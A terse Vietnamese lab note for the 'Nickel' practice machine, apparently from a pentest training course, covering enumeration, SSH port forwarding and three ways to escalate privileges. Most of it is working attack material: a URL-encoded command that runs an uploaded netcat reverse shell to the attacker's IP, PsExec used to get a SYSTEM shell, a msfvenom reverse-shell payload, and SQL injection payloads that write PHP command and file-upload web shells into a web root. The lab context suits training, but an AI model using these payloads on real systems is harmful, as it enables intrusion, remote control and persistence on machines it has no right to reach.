Nickel - Port forwarding - 3 cách leo thang

Step by step

1. nmap
2. curl thử
3. ssh vào
4. enum open port
5. port 80 open ở local
6. port forwarding để vào được site
7. using command

3 cách leo thang

Cách 1

curl trong shell ariah Sau đó localhost?command Upload nc.exe tới thư mục của users(có quyền write) Sau đó curl curl curl http://localhost?cd%20C%3A%5CUsers%5Cariah%3B %20.%5Cnc.exe%20-nv%20192.168.45.250%204444%20-e%20cmd

Cách 2

scp ./PsExec64.exe ariah@192.168.179.99:C:/Users/ariah/Downloads/psexec.exe Bash

psexec.exe -accepteula -s cmd.exe

Cách 3

ssh -f -N -L 127.0.0.1:8080:127.0.0.1:80 ariah@192.168.179.99 Listen port 8080 ở kali forward sang 80 ở ssh ariah

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=139 -f exe > bd.exe

' UNION SELECT ("<?php echo passthru($\_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'

Hint upload file shell to SQL

' UNION SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>" INTO OUTFILE 'C:/xampp/htdocs/cmd2.php' -- -'